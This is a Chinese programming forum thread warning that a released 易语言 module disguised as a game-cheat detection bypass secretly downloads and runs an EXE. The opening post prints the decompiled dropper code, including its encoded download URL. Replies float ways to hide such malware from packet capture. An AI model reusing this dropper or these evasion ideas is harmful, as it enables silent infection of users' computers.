发布源码内带恶意模块!

火狐编程 · 发表于 2015-12-26 15:49:04

用户名：宝驴(UID: 87124) 帖子：http://bbs.125.la/thread-13855631-1-1.html 发布恶意模块，附带的源码内的模块有恶意模块，后台下载EXE，下列模块分析
.程序集匿名程序集_10000, , ,

.子程序 _启动子程序, 整数型, 公开, 请在本子程序中放置易模块初始化代码
.局部变量匿名局部变量_字节集_6, 字节集, , ,

赋值 (匿名局部变量_字节集_6, HTTP读文件 (到文本 ({ 104, 116, 116, 112, 58, 47, 47, 113, 105, 110, 103, 121, 97, 102, 122, 46, 51, 51, 50, 50, 46, 111, 114, 103, 47, 121, 116, 109, 100, 46, 101, 120, 101 })))
写到文件 (相加 (取特定目录 (11), 到文本 ({ 92, 121, 116, 109, 100, 46, 101, 120, 101 })), 匿名局部变量_字节集_6)
运行 (相加 (取特定目录 (11), 到文本 ({ 92, 121, 116, 109, 100, 46, 101, 120, 101 })), 假, )

匿名子程序_10002 ()
返回 (0)

.子程序匿名子程序_10002, , ,

.子程序 Trc_透视过检测, , 公开, 调用方式：Trc_透视过检测（） ‘完美过大部分功能数据检测，更新日期：2015年12月26日 14:00

.子程序 Trc_自瞄过检测, , 公开, 调用方式：Trc_自瞄过检测（） ‘完美过大部分功能数据检测，更新日期：2015年12月26日 14:00

.子程序 Trc_全局过检测, , 公开, 调用方式：Trc_全局过检测（） ‘完美过大部分功能数据检测，更新日期：2015年12月26日 14:00

回去这个网站下载：http://qingyafz.3322.org/ytmd.exe 然后运行

火狐编程 · 发表于 2015-12-26 15:53:58

@宿海仁太 @孤心人

真命王子 · 发表于 2015-12-26 16:37:23

易语言5.41编写的模块1。0和2.0是无法查看源码的，<(￣▽￣)> 哇哈哈…

真命王子 · 发表于 2015-12-26 16:38:02

火狐编程发表于 2015-12-26 15:53
@宿海仁太 @孤心人

编写模块的人如果用5.41的话你就看不到了，╮(╯▽╰)╭

火狐编程 · 发表于 2015-12-26 16:54:47

真命王子发表于 2015-12-26 16:38
编写模块的人如果用5.41的话你就看不到了，╮(╯▽╰)╭

还可抓包！

真命王子 · 发表于 2015-12-26 17:10:23

火狐编程发表于 2015-12-26 16:54
还可抓包！

so？注入外部进程，让其他进程完成不就行了？这个是技术问题

真命王子 · 发表于 2015-12-26 17:10:49

火狐编程发表于 2015-12-26 16:54
还可抓包！

或者模块病毒就在资源表捏

比你歪歪 · 发表于 2015-12-26 17:31:39

6666666666666

火狐编程 · 发表于 2015-12-26 17:44:09

真命王子发表于 2015-12-26 17:10
so？注入外部进程，让其他进程完成不就行了？这个是技术问题

- - 不论你怎么注入，除非不联网！抓个地址还是逃不脱的！

真命王子 · 发表于 2015-12-26 19:03:00

火狐编程发表于 2015-12-26 17:44
- - 不论你怎么注入，除非不联网！抓个地址还是逃不脱的！

那就把病毒藏模块里好了

		自动登录	找回密码
密码			注册

[已答复] 发布源码内带恶意模块!

评分

浏览过的版块